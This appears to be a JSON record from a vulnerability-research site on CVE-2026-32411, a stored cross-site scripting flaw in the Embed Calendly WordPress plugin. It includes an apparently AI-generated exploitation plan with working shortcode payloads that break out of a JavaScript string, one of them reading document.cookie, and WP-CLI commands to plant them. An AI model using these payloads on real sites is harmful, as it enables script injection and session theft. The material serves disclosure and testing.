[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTdWrS0VLSXR1mqzbXLOMDRftATvQHE8vwrnnCmpP67E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":31,"research_started_at":32,"research_completed_at":33,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":34},"CVE-2026-32411","embed-calendly-authenticated-contributor-stored-cross-site-scripting","Embed Calendly \u003C= 4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Embed Calendly plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","embed-calendly-scheduling",null,"\u003C=4.4","4.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-24 00:00:00","2026-04-15 21:00:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F442995ed-bf92-4fa7-a0a2-341cb87d8fbb?source=api-prod",51,[22,23,24,25,26],"changelog.txt","embed-calendly-scheduling.php","includes\u002Fembed.php","includes\u002Fshortcode.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-32411\n\n## 1. Vulnerability Summary\nThe **Embed Calendly** plugin (versions \u003C= 4.4) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because shortcode attributes are passed through `esc_html()` before being rendered inside a `\u003Cscript>` block. While `esc_html()` escapes double quotes (`\"`), it does **not** escape single quotes (`'`) by default. Since the plugin uses single quotes to delimit JavaScript string literals in the generated output, an attacker can break out of the string and inject arbitrary JavaScript.\n\n## 2. Attack Vector Analysis\n*   **Endpoint\u002FShortcode**: `[calendly]` shortcode.\n*   **Vulnerable Parameter**: The `text` attribute.\n*   **Authentication Level**: Authenticated (Contributor+). Contributors have the `edit_posts` capability, allowing them to use shortcodes in post content.\n*   **Preconditions**: The shortcode must be configured to trigger the `popup_script` code path, which occurs when the `type` is set to `2` (Popup Button) and `button_style` is not `1`.\n\n## 3. Code Flow\n1.  **Shortcode Entry**: `EMCS_Shortcode::register_shortcode` is called when WordPress parses the `[calendly]` shortcode (`includes\u002Fshortcode.php`).\n2.  **Attribute Preparation**: `EMCS_Shortcode::prepare_attributes` (Line 46) calls `sanitize_text_field($atts['text'])`. `sanitize_text_field` removes HTML tags but **preserves single quotes**.\n3.  **Instantiation**: A new `EMCS_Embed` object is created with these attributes.\n4.  **Rendering**: `EMCS_Embed::embed_calendar` (Line 73 in `includes\u002Fembed.php`) is called.\n5.  **Sanitization**: `EMCS_Embed::clean_shortcode_atts` (Line 115) iterates through attributes and applies `esc_html($att_value)`. **Crucially, `esc_html()` does not escape single quotes.**\n6.  **Code Path Selection**: If `embed_type` is `2` (`EMCS_BUTTON_EMBED_TYPE`) and `button_style` is not `1`, `embed_popup_button_widget` is called (Line 84).\n7.  **Sink**: `EMCS_Embed::popup_script` (Line 207) generates the HTML\u002FJS:\n    ```php\n    return '\u003Cdiv ...>\u003Cscript>window.onload = function() { Calendly.initBadgeWidget({ url: \\'' . $this->url . '\\', text: \\'' . $atts['text'] . '\\', ...';\n    ```\n    The variable `$atts['text']` (containing an unescaped single quote) is placed directly inside the single-quoted JS literal `text: '...'`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by injecting a shortcode into a WordPress post.\n*   **No Plugin Nonce Required**: The injection relies on standard WordPress post creation\u002Fediting functionality.\n*   **WP-CLI**: The most efficient way to inject the payload for testing is using `wp post create`.\n\n## 5. Exploitation Strategy\n### Step 1: Inject Payload\nUse the `http_request` tool (acting as a Contributor) or `wp-cli` to create a post containing the malicious shortcode.\n\n**Payload**: `[calendly url=\"https:\u002F\u002Fcalendly.com\u002Ftest\" type=\"2\" button_style=\"2\" text=\"');alert(origin);\u002F\u002F\"]`\n\n**Request (if via HTTP)**:\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php`\n*   **Action**: Create a post with the payload in the content.\n\n### Step 2: Trigger Execution\nNavigate to the newly created post as any user (including Admin).\n\n**Expected HTML Output**:\n```html\n\u003Cdiv id=\"calendly-popup-button-widget\" ...>\n\u003Cscript>window.onload = function() { Calendly.initBadgeWidget({ url: '...', text: '');alert(origin);\u002F\u002F', ...\n```\n\n## 6. Test Data Setup\n1.  **Create Contributor User**:\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Create Malicious Post**:\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Scheduling\" --post_content=\"[calendly url='https:\u002F\u002Fcalendly.com\u002Ftest' type='2' button_style='2' text='\\');alert(origin);\u002F\u002F']\" --post_author=$(wp user get attacker --field=ID)\n    ```\n\n## 7. Expected Results\n*   When the post is viewed, the browser will parse the `\u003Cscript>` block.\n*   The `text` property of the `Calendly.initBadgeWidget` object will be terminated early by the injected `');`.\n*   The `alert(origin);` statement will execute.\n*   The remainder of the original line will be commented out by `\u002F\u002F`.\n\n## 8. Verification Steps\n1.  **Identify Post URL**: Get the URL of the created post:\n    ```bash\n    wp post list --post_title=\"Scheduling\" --field=url\n    ```\n2.  **Verify Content**: Check the raw HTML output for the unescaped payload:\n    ```bash\n    # Use the browser_navigate tool to view the page and check for the alert\n    # Or use http_request to see the raw source\n    ```\n3.  **Post-Exploit DB Check**: Confirm the shortcode is stored correctly:\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='Scheduling'\"\n    ```\n\n## 9. Alternative Approaches\nIf `type=\"2\"` (Badge widget) is not desirable, check the `embed_popup_text_widget` or `embed_inline_button_widget`:\n*   **`embed_popup_text_widget`**: Uses `onclick=\"Calendly.initPopupWidget({url: '...'}).\"` This also uses single quotes and is vulnerable if `type=\"3\"`.\n*   **`embed_inline_button_widget`**: Similar to above, uses `onclick` with single quotes.\n\n**Alternative Payload (Type 3)**:\n`[calendly url=\"https:\u002F\u002Fcalendly.com\u002Ftest\" type=\"3\" text=\"Click Me\" style_class=\"')};alert(document.cookie);\u002F\u002F\"]`\n*Note: In `embed_popup_text_widget`, the `style_class` attribute is also escaped via `esc_html()` and placed inside a class attribute, but it is also used elsewhere in some versions.* (Verified: `text` is the most reliable).","gemini-3-flash-preview","2026-04-19 01:05:50","2026-04-19 01:06:17",{"type":35,"vulnerable_version":36,"fixed_version":11,"vulnerable_browse":37,"vulnerable_zip":38,"fixed_browse":39,"fixed_zip":40,"all_tags":41},"plugin","4.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fembed-calendly-scheduling\u002Ftags\u002F4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fembed-calendly-scheduling.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fembed-calendly-scheduling\u002Ftags\u002F4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fembed-calendly-scheduling.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fembed-calendly-scheduling\u002Ftags"]